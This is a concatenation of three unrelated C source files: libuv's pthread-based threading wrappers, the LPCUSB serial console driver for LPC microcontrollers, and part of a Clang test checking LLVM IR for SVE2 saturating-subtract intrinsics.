(pthread_mutex_destroy(mutex)) abort(); } void uv_mutex_lock(uv_mutex_t* mutex) { if (pthread_mutex_lock(mutex)) abort(); } int uv_mutex_trylock(uv_mutex_t* mutex) { int err; err = pthread_mutex_trylock(mutex); if (err) { if (err != EBUSY && err != EAGAIN) abort(); return -EBUSY; } return 0; } void uv_mutex_unlock(uv_mutex_t* mutex) { if (pthread_mutex_unlock(mutex)) abort(); } int uv_rwlock_init(uv_rwlock_t* rwlock) { return -pthread_rwlock_init(rwlock, NULL); } void uv_rwlock_destroy(uv_rwlock_t* rwlock) { if (pthread_rwlock_destroy(rwlock)) abort(); } void uv_rwlock_rdlock(uv_rwlock_t* rwlock) { if (pthread_rwlock_rdlock(rwlock)) abort(); } int uv_rwlock_tryrdlock(uv_rwlock_t* rwlock) { int err; err = pthread_rwlock_tryrdlock(rwlock); if (err) { if (err != EBUSY && err != EAGAIN) abort(); return -EBUSY; } return 0; } void uv_rwlock_rdunlock(uv_rwlock_t* rwlock) { if (pthread_rwlock_unlock(rwlock)) abort(); } void uv_rwlock_wrlock(uv_rwlock_t* rwlock) { if (pthread_rwlock_wrlock(rwlock)) abort(); } int uv_rwlock_trywrlock(uv_rwlock_t* rwlock) { int err; err = pthread_rwlock_trywrlock(rwlock); if (err) { if (err != EBUSY && err != EAGAIN) abort(); return -EBUSY; } return 0; } void uv_rwlock_wrunlock(uv_rwlock_t* rwlock) { if (pthread_rwlock_unlock(rwlock)) abort(); } void uv_once(uv_once_t* guard, void (*callback)(void)) { if (pthread_once(guard, callback)) abort(); } #if defined(__APPLE__) && defined(__MACH__) int uv_sem_init(uv_sem_t* sem, unsigned int value) { kern_return_t err; err = semaphore_create(mach_task_self(), sem, SYNC_POLICY_FIFO, value); if (err == KERN_SUCCESS) return 0; if (err == KERN_INVALID_ARGUMENT) return -EINVAL; if (err == KERN_RESOURCE_SHORTAGE) return -ENOMEM; abort(); return -EINVAL; /* Satisfy the compiler. */ } void uv_sem_destroy(uv_sem_t* sem) { if (semaphore_destroy(mach_task_self(), *sem)) abort(); } void uv_sem_post(uv_sem_t* sem) { if (semaphore_signal(*sem)) abort(); } void uv_sem_wait(uv_sem_t* sem) { int r; do r = semaphore_wait(*sem); while (r == KERN_ABORTED); if (r != KERN_SUCCESS) abort(); } int uv_sem_trywait(uv_sem_t* sem) { mach_timespec_t interval; kern_return_t err; interval.tv_sec = 0; interval.tv_nsec = 0; err = semaphore_timedwait(*sem, interval); if (err == KERN_SUCCESS) return 0; if (err == KERN_OPERATION_TIMED_OUT) return -EAGAIN; abort(); return -EINVAL; /* Satisfy the compiler. */ } #else /* !(defined(__APPLE__) && defined(__MACH__)) */ int uv_sem_init(uv_sem_t* sem, unsigned int value) { if (sem_init(sem, 0, value)) return -errno; return 0; } void uv_sem_destroy(uv_sem_t* sem) { if (sem_destroy(sem)) abort(); } void uv_sem_post(uv_sem_t* sem) { if (sem_post(sem)) abort(); } void uv_sem_wait(uv_sem_t* sem) { int r; do r = sem_wait(sem); while (r == -1 && errno == EINTR); if (r) abort(); } int uv_sem_trywait(uv_sem_t* sem) { int r; do r = sem_trywait(sem); while (r == -1 && errno == EINTR); if (r) { if (errno == EAGAIN) return -EAGAIN; abort(); } return 0; } #endif /* defined(__APPLE__) && defined(__MACH__) */ #if defined(__APPLE__) && defined(__MACH__) int uv_cond_init(uv_cond_t* cond) { return -pthread_cond_init(cond, NULL); } #else /* !(defined(__APPLE__) && defined(__MACH__)) */ int uv_cond_init(uv_cond_t* cond) { pthread_condattr_t attr; int err; err = pthread_condattr_init(&attr); if (err) return -err; #if !(defined(__ANDROID__) && defined(HAVE_PTHREAD_COND_TIMEDWAIT_MONOTONIC)) err = pthread_condattr_setclock(&attr, CLOCK_MONOTONIC); if (err) goto error2; #endif err = pthread_cond_init(cond, &attr); if (err) goto error2; err = pthread_condattr_destroy(&attr); if (err) goto error; return 0; error: pthread_cond_destroy(cond); error2: pthread_condattr_destroy(&attr); return -err; } #endif /* defined(__APPLE__) && defined(__MACH__) */ void uv_cond_destroy(uv_cond_t* cond) { if (pthread_cond_destroy(cond)) abort(); } void uv_cond_signal(uv_cond_t* cond) { if (pthread_cond_signal(cond)) abort(); } void uv_cond_broadcast(uv_cond_t* cond) { if (pthread_cond_broadcast(cond)) abort(); } void uv_cond_wait(uv_cond_t* cond, uv_mutex_t* mutex) { if (pthread_cond_wait(cond, mutex)) abort(); } int uv_cond_timedwait(uv_cond_t* cond, uv_mutex_t* mutex, uint64_t timeout) { int r; struct timespec ts; #if defined(__APPLE__) && defined(__MACH__) ts.tv_sec = timeout / NANOSEC; ts.tv_nsec = timeout % NANOSEC; r = pthread_cond_timedwait_relative_np(cond, mutex, &ts); #else timeout += uv__hrtime(UV_CLOCK_PRECISE); ts.tv_sec = timeout / NANOSEC; ts.tv_nsec = timeout % NANOSEC; #if defined(__ANDROID__) && defined(HAVE_PTHREAD_COND_TIMEDWAIT_MONOTONIC) /* * The bionic pthread implementation doesn't support CLOCK_MONOTONIC, * but has this alternative function instead. */ r = pthread_cond_timedwait_monotonic_np(cond, mutex, &ts); #else r = pthread_cond_timedwait(cond, mutex, &ts); #endif /* __ANDROID__ */ #endif if (r == 0) return 0; if (r == ETIMEDOUT) return -ETIMEDOUT; abort(); return -EINVAL; /* Satisfy the compiler. */ } #if defined(__APPLE__) && defined(__MACH__) int uv_barrier_init(uv_barrier_t* barrier, unsigned int count) { int err; barrier->n = count; barrier->count = 0; err = uv_mutex_init(&barrier->mutex); if (err) return -err; err = uv_sem_init(&barrier->turnstile1, 0); if (err) goto error2; err = uv_sem_init(&barrier->turnstile2, 1); if (err) goto error; return 0; error: uv_sem_destroy(&barrier->turnstile1); error2: uv_mutex_destroy(&barrier->mutex); return -err; } void uv_barrier_destroy(uv_barrier_t* barrier) { uv_sem_destroy(&barrier->turnstile2); uv_sem_destroy(&barrier->turnstile1); uv_mutex_destroy(&barrier->mutex); } int uv_barrier_wait(uv_barrier_t* barrier) { int serial_thread; uv_mutex_lock(&barrier->mutex); if (++barrier->count == barrier->n) { uv_sem_wait(&barrier->turnstile2); uv_sem_post(&barrier->turnstile1); } uv_mutex_unlock(&barrier->mutex); uv_sem_wait(&barrier->turnstile1); uv_sem_post(&barrier->turnstile1); uv_mutex_lock(&barrier->mutex); serial_thread = (--barrier->count == 0); if (serial_thread) { uv_sem_wait(&barrier->turnstile1); uv_sem_post(&barrier->turnstile2); } uv_mutex_unlock(&barrier->mutex); uv_sem_wait(&barrier->turnstile2); uv_sem_post(&barrier->turnstile2); return serial_thread; } #else /* !(defined(__APPLE__) && defined(__MACH__)) */ int uv_barrier_init(uv_barrier_t* barrier, unsigned int count) { return -pthread_barrier_init(barrier, NULL, count); } void uv_barrier_destroy(uv_barrier_t* barrier) { if (pthread_barrier_destroy(barrier)) abort(); } int uv_barrier_wait(uv_barrier_t* barrier) { int r = pthread_barrier_wait(barrier); if (r && r != PTHREAD_BARRIER_SERIAL_THREAD) abort(); return r == PTHREAD_BARRIER_SERIAL_THREAD; } #endif /* defined(__APPLE__) && defined(__MACH__) */ int uv_key_create(uv_key_t* key) { return -pthread_key_create(key, NULL); } void uv_key_delete(uv_key_t* key) { if (pthread_key_delete(*key)) abort(); } void* uv_key_get(uv_key_t* key) { return pthread_getspecific(*key); } void uv_key_set(uv_key_t* key, void* value) { if (pthread_setspecific(*key, value)) abort(); }
632149.c
/* LPCUSB, an USB device driver for LPC microcontrollers Copyright (C) 2006 Bertrik Sikken (bertrik@sikken.nl) Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. The name of the author may not be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ /* Simple console input/output, over serial port #0 Partially copied from Jim Lynch's tutorial */ #include "console.h" #define PINSEL0 *(volatile unsigned int *)0xE002C000 #define U0THR *(volatile unsigned int *)0xE000C000 #define U0RBR *(volatile unsigned int *)0xE000C000 #define U0DLL *(volatile unsigned int *)0xE000C000 #define U0DLM *(volatile unsigned int *)0xE000C004 #define U0FCR *(volatile unsigned int *)0xE000C008 #define U0LCR *(volatile unsigned int *)0xE000C00C #define U0LSR *(volatile unsigned int *)0xE000C014 /* Initialize Serial Interface */ void ConsoleInit(int iDivider) { PINSEL0 = (PINSEL0 & ~0x0000000F) | 0x00000005; /* Enable RxD0 and TxD0 */ U0LCR = 0x83; /* 8 bits, no Parity, 1 Stop bit */ U0DLL = iDivider & 0xFF; /* set divider / baud rate */ U0DLM = iDivider >> 8; U0LCR = 0x03; /* DLAB = 0 */ // enable FIFO U0FCR = 1; } /* Write character to Serial Port */ int putchar(int ch) { if (ch == '\n') { while (!(U0LSR & 0x20)); U0THR = '\r'; } while (!(U0LSR & 0x20)); U0THR = ch; return ch; } int getchar (void) { /* Read character from Serial Port */ while (!(U0LSR & 0x01)); return (U0RBR); } int puts(const char *s) { while (*s) { putchar(*s++); } putchar('\n'); return 1; }
253323.c
// NOTE: Assertions have been autogenerated by utils/update_cc_test_checks.py // REQUIRES: aarch64-registered-target // RUN: %clang_cc1 -triple aarch64-none-linux-gnu -target-feature +sve2 -fallow-half-arguments-and-returns -S -O1 -Werror -Wall -emit-llvm -o - %s | FileCheck %s // RUN: %clang_cc1 -triple aarch64-none-linux-gnu -target-feature +sve2 -fallow-half-arguments-and-returns -S -O1 -Werror -Wall -emit-llvm -o - -x c++ %s | FileCheck %s -check-prefix=CPP-CHECK // RUN: %clang_cc1 -DSVE_OVERLOADED_FORMS -triple aarch64-none-linux-gnu -target-feature +sve2 -fallow-half-arguments-and-returns -S -O1 -Werror -Wall -emit-llvm -o - %s | FileCheck %s // RUN: %clang_cc1 -DSVE_OVERLOADED_FORMS -triple aarch64-none-linux-gnu -target-feature +sve2 -fallow-half-arguments-and-returns -S -O1 -Werror -Wall -emit-llvm -o - -x c++ %s | FileCheck %s -check-prefix=CPP-CHECK // RUN: %clang_cc1 -triple aarch64-none-linux-gnu -target-feature +sve -fallow-half-arguments-and-returns -fsyntax-only -verify -verify-ignore-unexpected=error %s // RUN: %clang_cc1 -DSVE_OVERLOADED_FORMS -triple aarch64-none-linux-gnu -target-feature +sve -fallow-half-arguments-and-returns -fsyntax-only -verify=overload -verify-ignore-unexpected=error %s #include <arm_sve.h> #ifdef SVE_OVERLOADED_FORMS // A simple used,unused... macro, long enough to represent any SVE builtin. #define SVE_ACLE_FUNC(A1,A2_UNUSED,A3,A4_UNUSED) A1##A3 #else #define SVE_ACLE_FUNC(A1,A2,A3,A4) A1##A2##A3##A4 #endif // CHECK-LABEL: @test_svqsub_s8_z( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.sel.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> zeroinitializer) // CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.sqsub.nxv16i8(<vscale x 16 x i1> [[PG]], <vscale x 16 x i8> [[TMP0]], <vscale x 16 x i8> [[OP2:%.*]]) // CHECK-NEXT: ret <vscale x 16 x i8> [[TMP1]] // // CPP-CHECK-LABEL: @_Z16test_svqsub_s8_zu10__SVBool_tu10__SVInt8_tu10__SVInt8_t( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.sel.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> zeroinitializer) // CPP-CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.sqsub.nxv16i8(<vscale x 16 x i1> [[PG]], <vscale x 16 x i8> [[TMP0]], <vscale x 16 x i8> [[OP2:%.*]]) // CPP-CHECK-NEXT: ret <vscale x 16 x i8> [[TMP1]] // svint8_t test_svqsub_s8_z(svbool_t pg, svint8_t op1, svint8_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_z'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_s8_z'}} return SVE_ACLE_FUNC(svqsub,_s8,_z,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_s16_z( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.sel.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> zeroinitializer) // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.sqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[TMP1]], <vscale x 8 x i16> [[OP2:%.*]]) // CHECK-NEXT: ret <vscale x 8 x i16> [[TMP2]] // // CPP-CHECK-LABEL: @_Z17test_svqsub_s16_zu10__SVBool_tu11__SVInt16_tu11__SVInt16_t( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.sel.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> zeroinitializer) // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.sqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[TMP1]], <vscale x 8 x i16> [[OP2:%.*]]) // CPP-CHECK-NEXT: ret <vscale x 8 x i16> [[TMP2]] // svint16_t test_svqsub_s16_z(svbool_t pg, svint16_t op1, svint16_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_z'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_s16_z'}} return SVE_ACLE_FUNC(svqsub,_s16,_z,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_s32_z( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.sel.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> zeroinitializer) // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.sqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[TMP1]], <vscale x 4 x i32> [[OP2:%.*]]) // CHECK-NEXT: ret <vscale x 4 x i32> [[TMP2]] // // CPP-CHECK-LABEL: @_Z17test_svqsub_s32_zu10__SVBool_tu11__SVInt32_tu11__SVInt32_t( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.sel.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> zeroinitializer) // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.sqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[TMP1]], <vscale x 4 x i32> [[OP2:%.*]]) // CPP-CHECK-NEXT: ret <vscale x 4 x i32> [[TMP2]] // svint32_t test_svqsub_s32_z(svbool_t pg, svint32_t op1, svint32_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_z'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_s32_z'}} return SVE_ACLE_FUNC(svqsub,_s32,_z,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_s64_z( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.sel.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> zeroinitializer) // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.sqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[TMP1]], <vscale x 2 x i64> [[OP2:%.*]]) // CHECK-NEXT: ret <vscale x 2 x i64> [[TMP2]] // // CPP-CHECK-LABEL: @_Z17test_svqsub_s64_zu10__SVBool_tu11__SVInt64_tu11__SVInt64_t( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.sel.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> zeroinitializer) // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.sqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[TMP1]], <vscale x 2 x i64> [[OP2:%.*]]) // CPP-CHECK-NEXT: ret <vscale x 2 x i64> [[TMP2]] // svint64_t test_svqsub_s64_z(svbool_t pg, svint64_t op1, svint64_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_z'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_s64_z'}} return SVE_ACLE_FUNC(svqsub,_s64,_z,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_u8_z( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.sel.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> zeroinitializer) // CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.uqsub.nxv16i8(<vscale x 16 x i1> [[PG]], <vscale x 16 x i8> [[TMP0]], <vscale x 16 x i8> [[OP2:%.*]]) // CHECK-NEXT: ret <vscale x 16 x i8> [[TMP1]] // // CPP-CHECK-LABEL: @_Z16test_svqsub_u8_zu10__SVBool_tu11__SVUint8_tu11__SVUint8_t( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.sel.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> zeroinitializer) // CPP-CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.uqsub.nxv16i8(<vscale x 16 x i1> [[PG]], <vscale x 16 x i8> [[TMP0]], <vscale x 16 x i8> [[OP2:%.*]]) // CPP-CHECK-NEXT: ret <vscale x 16 x i8> [[TMP1]] // svuint8_t test_svqsub_u8_z(svbool_t pg, svuint8_t op1, svuint8_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_z'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_u8_z'}} return SVE_ACLE_FUNC(svqsub,_u8,_z,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_u16_z( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.sel.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> zeroinitializer) // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.uqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[TMP1]], <vscale x 8 x i16> [[OP2:%.*]]) // CHECK-NEXT: ret <vscale x 8 x i16> [[TMP2]] // // CPP-CHECK-LABEL: @_Z17test_svqsub_u16_zu10__SVBool_tu12__SVUint16_tu12__SVUint16_t( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.sel.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> zeroinitializer) // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.uqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[TMP1]], <vscale x 8 x i16> [[OP2:%.*]]) // CPP-CHECK-NEXT: ret <vscale x 8 x i16> [[TMP2]] // svuint16_t test_svqsub_u16_z(svbool_t pg, svuint16_t op1, svuint16_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_z'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_u16_z'}} return SVE_ACLE_FUNC(svqsub,_u16,_z,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_u32_z( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.sel.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> zeroinitializer) // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.uqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[TMP1]], <vscale x 4 x i32> [[OP2:%.*]]) // CHECK-NEXT: ret <vscale x 4 x i32> [[TMP2]] // // CPP-CHECK-LABEL: @_Z17test_svqsub_u32_zu10__SVBool_tu12__SVUint32_tu12__SVUint32_t( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.sel.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> zeroinitializer) // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.uqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[TMP1]], <vscale x 4 x i32> [[OP2:%.*]]) // CPP-CHECK-NEXT: ret <vscale x 4 x i32> [[TMP2]] // svuint32_t test_svqsub_u32_z(svbool_t pg, svuint32_t op1, svuint32_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_z'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_u32_z'}} return SVE_ACLE_FUNC(svqsub,_u32,_z,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_u64_z( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.sel.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> zeroinitializer) // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.uqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[TMP1]], <vscale x 2 x i64> [[OP2:%.*]]) // CHECK-NEXT: ret <vscale x 2 x i64> [[TMP2]] // // CPP-CHECK-LABEL: @_Z17test_svqsub_u64_zu10__SVBool_tu12__SVUint64_tu12__SVUint64_t( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.sel.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> zeroinitializer) // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.uqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[TMP1]], <vscale x 2 x i64> [[OP2:%.*]]) // CPP-CHECK-NEXT: ret <vscale x 2 x i64> [[TMP2]] // svuint64_t test_svqsub_u64_z(svbool_t pg, svuint64_t op1, svuint64_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_z'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_u64_z'}} return SVE_ACLE_FUNC(svqsub,_u64,_z,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_s8_m( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.sqsub.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> [[OP2:%.*]]) // CHECK-NEXT: ret <vscale x 16 x i8> [[TMP0]] // // CPP-CHECK-LABEL: @_Z16test_svqsub_s8_mu10__SVBool_tu10__SVInt8_tu10__SVInt8_t( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.sqsub.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> [[OP2:%.*]]) // CPP-CHECK-NEXT: ret <vscale x 16 x i8> [[TMP0]] // svint8_t test_svqsub_s8_m(svbool_t pg, svint8_t op1, svint8_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_m'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_s8_m'}} return SVE_ACLE_FUNC(svqsub,_s8,_m,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_s16_m( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.sqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> [[OP2:%.*]]) // CHECK-NEXT: ret <vscale x 8 x i16> [[TMP1]] // // CPP-CHECK-LABEL: @_Z17test_svqsub_s16_mu10__SVBool_tu11__SVInt16_tu11__SVInt16_t( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.sqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> [[OP2:%.*]]) // CPP-CHECK-NEXT: ret <vscale x 8 x i16> [[TMP1]] // svint16_t test_svqsub_s16_m(svbool_t pg, svint16_t op1, svint16_t op2) { // overload-warning@+2 